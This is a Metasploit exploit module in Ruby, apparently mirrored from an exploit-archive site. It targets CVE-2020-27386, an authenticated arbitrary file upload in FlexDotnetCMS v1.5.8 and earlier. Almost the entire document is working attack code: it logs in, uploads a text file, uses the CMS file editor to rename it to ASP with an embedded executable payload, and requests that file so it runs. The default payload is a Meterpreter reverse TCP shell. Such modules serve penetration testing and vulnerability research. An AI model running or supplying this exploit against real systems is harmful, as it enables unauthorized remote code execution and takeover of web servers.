Share
## https://sploitus.com/exploit?id=PACKETSTORM:160411
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'FlexDotnetCMS Arbitrary ASP File Upload',  
'Description' => %q{  
This module exploits an arbitrary file upload vulnerability in  
FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary  
commands with elevated privileges.  
  
The module first tries to authenticate to FlexDotnetCMS via an HTTP  
POST request to `/login`. It then attempts to upload a random TXT  
file and subsequently uses the FlexDotnetCMS file editor to rename  
the TXT file to an ASP file. If this succeeds, the target is  
vulnerable and the ASP file is generated as a copy of the TXT file,  
which remains on the server.  
  
Next, the module sends another request to rename the TXT file to an  
ASP file, this time adding the payload. Finally, the module tries  
to execute the ASP payload via a simple HTTP GET request to  
`/media/uploads/asp_payload`  
  
Valid credentials for a FlexDotnetCMS user with permissions to use  
the FileManager are required. This module has been successfully  
tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Erik Wynter' # @wyntererik - Discovery & Metasploit  
],  
'References' =>  
[  
['CVE', '2020-27386'],  
],  
'Platform' => 'win',  
'Targets' =>  
[  
[  
'Windows (x86)', {  
'Arch' => [ARCH_X86],  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Windows (x64)', {  
'Arch' => [ARCH_X64],  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'Privileged' => false,  
'DisclosureDate' => '2020-09-28'  
)  
)  
  
register_options [  
OptString.new('TARGETURI', [true, 'The base path to FlexDotnetCMS', '/']),  
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),  
OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])  
]  
end  
  
def rename_file(res, payload)  
# obtain tokens required for renaming the payload  
html = res.get_html_document  
viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')  
event_validation = html.at('input[@id="__EVENTVALIDATION"]')  
if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values  
return 'no_tokens'  
end  
  
viewstate_key = viewstate_key['value']  
event_validation = event_validation['value']  
  
# rename TXT payload to ASP using the file editor, this creates a copy of the TXT file, so both have to be deleted (this happens in cleanup)  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),  
'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" },  
'vars_post' => {  
'__EVENTTARGET' => 'ctl00$ContentPlaceHolder1$Save',  
'__VIEWSTATEKEY' => viewstate_key,  
'__EVENTVALIDATION' => event_validation,  
'ctl00$ContentPlaceHolder1$FileSelector$SelectedFile' => "/media/uploads/#{@payload_asp}",  
'ctl00$ContentPlaceHolder1$Editor' => payload  
}  
})  
end  
  
def check  
# used to ensure cleanup only runs against flexdotnetcms targets  
@skip_cleanup = true  
  
# visit login the page to get the necessary cookies  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'login/'),  
'keep_cookies' => true  
})  
  
unless res  
return CheckCode::Unknown('Connection failed')  
end  
  
# the login page doesn't contain the name of the app or the author, so we're combining a bunch of checks to limit the odds of failing to flag an incorrect target  
unless res.code == 200 && res.body.include?('<title>Login - Home</title>') && res.body.include?('<label>Email</label><br>') && res.body.include?('>Forgot my password</a>')  
return CheckCode::Safe('Target is not a FlexDotnetCMS application.')  
end  
  
# get cookies and tokens necessary for authentication  
html = res.get_html_document  
viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')  
event_validation = html.at('input[@id="__EVENTVALIDATION"]')  
if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values  
return CheckCode::Detected('Received unexpected response while trying to obtain tokens necessary for authentication from /login')  
end  
  
viewstate_key = viewstate_key['value']  
event_validation = event_validation['value']  
  
# perform login to verify if the target is a FlexDotnetCMS application  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'login/'),  
'keep_cookies' => true,  
'vars_post' => {  
# ideally the % in the line below would not be encoded, but I don't know how to achieve that without reverting to send_request_raw, which is ugly, and this works  
'LoginControl$ctl00' => 'LoginControl$ctl01%7CLoginControl$LoginButton',  
'__EVENTTARGET' => 'LoginControl$LoginButton',  
'__VIEWSTATEKEY' => viewstate_key,  
'LoginControl$Username' => datastore['USERNAME'],  
'LoginControl$Password' => datastore['PASSWORD'],  
'__EVENTVALIDATION' => event_validation,  
'__ASYNCPOST' => 'true'  
}  
})  
  
unless res  
return CheckCode::Detected('Connection failed')  
end  
  
unless res.code == 200 && res.body.include?('pageRedirect||%2fadmin')  
return CheckCode::Detected('Failed to authenticate to the server.')  
end  
  
# visit the backend dashboard  
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'Admin/')  
  
unless res  
return CheckCode::Detected('Connection failed')  
end  
  
unless res.code == 200 && res.body.include?('Welcome to your site editor:')  
return CheckCode::Detected('Received unexpected response while trying to follow redirect to /Admin/')  
end  
  
print_good('Successfully authenticated to FlexDotnetCMS')  
  
# prepare to upload a TXT file and rename it to an ASP file. If this works, the target is vulnerable.  
# generate file names and post data  
@payload_txt = "#{rand_text_alphanumeric(6..10)}.txt"  
@payload_asp = @payload_txt.split('.txt')[0] << '.asp'  
post_data = Rex::MIME::Message.new  
post_data.add_part('\\media\\uploads\\', nil, nil, 'form-data; name="folder"')  
post_data.add_part(rand_text_alpha(10..20), 'text/plain', nil, "form-data; name=\"file\"; filename=\"#{@payload_txt}\"")  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'Scripts', 'tinyfilemanager.net', 'dialog.aspx'),  
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",  
'headers' => {  
'Accept' => 'application/json',  
'X-Requested-With' => 'XMLHttpRequest',  
'X-File-Name' => @payload_txt  
},  
'vars_get' => {  
'cmd' => 'upload'  
},  
'data' => post_data.to_s  
})  
  
@skip_cleanup = false # cleanup only has to run if at least one attempt to upload a file has been made  
  
vprint_status("Uploading test file #{@payload_txt}...")  
  
unless res  
return CheckCode::Detected("Connection failed while trying to upload test file #{@payload_txt}")  
end  
  
unless res.code == 200  
return CheckCode::Detected("Received unexpected response while trying to upload test file #{@payload_txt}")  
end  
  
# load the test file in the file editor in order to obtain tokens required for renaming it  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),  
'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" }  
})  
  
unless res  
return CheckCode::Detected("Connection failed while trying to open test file #{@payload_txt} in the file editor")  
end  
  
unless res.code == 200 && res.body.include?('Successfully loaded file')  
return CheckCode::Detected("Received unexpected response while trying to open test file #{@payload_txt} in the file editor")  
end  
  
# FlexDotNetCMS displays the full installation path on the server in response to the previous GET request, so we can print it  
flexdotnetcms_path = res.body.scan(/jQuery\.jGrowl\(\"Successfully loaded file \( (.*?)WebApplication/).flatten.first  
unless flexdotnetcms_path.blank?  
print_status("FlexDotnetCMS is installed on the target at #{flexdotnetcms_path}")  
end  
  
print_status("Uploaded test file #{@payload_txt}. Attempting to rename the file to #{@payload_asp}...")  
res = rename_file(res, rand_text_alpha(10..20))  
if res == 'no_tokens'  
return CheckCode::Detected("Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}")  
end  
  
unless res  
return CheckCode::Detected("Connection failed while trying to rename the test file #{@payload_txt}.")  
end  
  
unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}")  
vprint_status("Failed to use the file editor to rename test file #{@payload_txt} to #{@payload_asp}")  
return CheckCode::Safe('Target is FlexDotnetCMS v1.5.9 or higher')  
end  
  
print_good("Successfully renamed test file #{@payload_txt} to #{@payload_asp} (this is a copy of #{@payload_txt}, which remains on the server)")  
  
return CheckCode::Vulnerable('Target is FlexDotnetCMS v1.5.8 or lower.')  
end  
  
def rename_test_file_and_add_payload  
print_status("Renaming #{@payload_txt} to #{@payload_asp} again, this time adding the payload")  
  
# load the file in the file editor in order to obtain tokens required for renaming it  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),  
'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" }  
})  
  
unless res  
fail_with(Failure::Disconnected, "Connection failed while trying to open #{@payload_txt} in the file editor")  
end  
  
unless res.code == 200 && res.body.include?('Successfully loaded file')  
fail_with(Failure::UnexpectedReply, "Received unexpected response while trying to open #{@payload_txt} in the file editor")  
end  
  
# genenerate ASP payload, then rename the TXT file again while adding the payload  
exe = generate_payload_exe  
payload = Msf::Util::EXE.to_exe_asp(exe).to_s  
res = rename_file(res, payload)  
if res == 'no_tokens'  
fail_with(Failure::UnexpectedReply, "Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}")  
end  
  
unless res  
fail_with(Failure::Disconnected, 'Connection failed while trying to add the ASP payload.')  
end  
  
unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}")  
fail_with(Failure::Unknown, 'Failed to add the ASP payload.')  
end  
  
print_good("Successfully added the ASP payload to #{@payload_asp}")  
end  
  
def cleanup  
# only run when at least one attempt to upload a file has been made  
return if @skip_cleanup  
  
# delete uploaded TXT and ASP files  
[@payload_txt, @payload_asp].each do |file|  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'Scripts', 'tinyfilemanager.net', 'dialog.aspx'),  
'vars_get' => {  
'cmd' => 'delfile',  
'file' => "\\media\\uploads\\#{file}",  
'currpath' => '\\media\\uploads\\'  
}  
})  
  
unless res && res.code == 200 && res.body.exclude?(file)  
print_error("Failed to delete #{file}.")  
print_warning("Manual cleanup of #{file} is required.")  
return  
end  
  
print_good("Successfully deleted #{file}")  
end  
end  
  
def exploit  
rename_test_file_and_add_payload  
print_status('Executing the payload...')  
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'media', 'uploads', @payload_asp.to_s)  
  
unless res  
fail_with(Failure::Disconnected, 'Connection failed while trying to execute the payload.')  
end  
  
unless res.code == 200  
fail_with(Failure::UnexpectedReply, 'Received unexpected response while trying to execute the payload')  
end  
end  
end